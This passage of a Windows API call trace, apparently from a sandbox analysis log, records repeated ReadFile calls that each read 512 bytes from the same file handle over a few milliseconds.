lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.249] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, 